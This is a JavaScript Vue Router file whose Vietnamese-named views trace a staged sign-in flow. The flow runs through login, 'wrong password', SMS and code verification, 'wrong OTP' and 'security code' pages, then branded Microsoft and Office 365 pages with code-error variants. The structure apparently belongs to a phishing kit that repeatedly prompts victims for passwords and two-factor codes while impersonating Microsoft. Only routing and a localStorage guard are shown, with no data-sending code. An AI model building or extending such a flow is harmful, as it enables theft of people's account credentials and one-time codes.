import Vue from 'vue';
import VueRouter from 'vue-router';

import Login from '../views/3_Login/Login.vue';
import Start from '../views/2_MailDN_Error/MailDN.vue';
import SaiMK from '../views/4_Sai_MK/SaiMK.vue';
import XacMinh from '../views/8_Xac_Minh/XacMinh.vue';
import XacMinhSMS from '../views/5_Xac_Minh_SMS/XacMinhSMS.vue';
import XacMinhCode from '../views/6_XacMinh_Code/XacMinhCode.vue';
import XacMinhCodeErr from '../views/7_XacMinh_Code_Err/XacMinh_CodeErr.vue';
import XacMinhErr from '../views/9_Xac_Minh_Err/XacMinhErr.vue';
import PheDuyet from '../views/10_PheDuyet/PheDuyet.vue';

import Microsoft from '../views/11_microsoft/Microsoft.vue';
import Microsoft_Error from '../views/12_microsoft_saicode/Microsoft.vue';

import Office from '../views/13_office365/Office.vue';
import Office_Error from '../views/14_office365_saicode/Office.vue';

Vue.use(VueRouter);

const router = new VueRouter({
  mode: 'history',
  routes: [
    { path: '/login', component: Login },
    { path: '/wrong-pass', component: SaiMK, meta: { requiresLogin: true } },
    { path: '/confirm', component: XacMinh, meta: { requiresLogin: true } },
    { path: '/wrong-otp', component: XacMinhErr, meta: { requiresLogin: true } },

    { path: '/confirm-sms', component: XacMinhSMS, meta: { requiresLogin: true } },
    { path: '/confirm-code', component: XacMinhCode, meta: { requiresLogin: true } },
    { path: '/wrong-auth', component: XacMinhCodeErr, meta: { requiresLogin: true } },
    { path: '/security-code', component: PheDuyet, meta: { requiresLogin: true } },

    { path: '/microsoft', component: Microsoft, meta: { requiresLogin: true } },
    { path: '/microsoft-error', component: Microsoft_Error, meta: { requiresLogin: true } },

    { path: '/office', component: Office, meta: { requiresLogin: true } },
    { path: '/office-error', component: Office_Error, meta: { requiresLogin: true } },

    { path: '*', redirect: '/login' }
  ]
});

router.beforeEach((to, from, next) => {
  // Kiểm tra trạng thái đăng nhập từ localStorage
  const isLoggedIn = localStorage.getItem('isLoggedIn') === 'true';
  if (to.matched.some(record => record.meta.requiresLogin)) {
    if (!isLoggedIn) {
      next('/login');
    } else {
      next();
    }
  } else {
    next();
  }
});

export default router;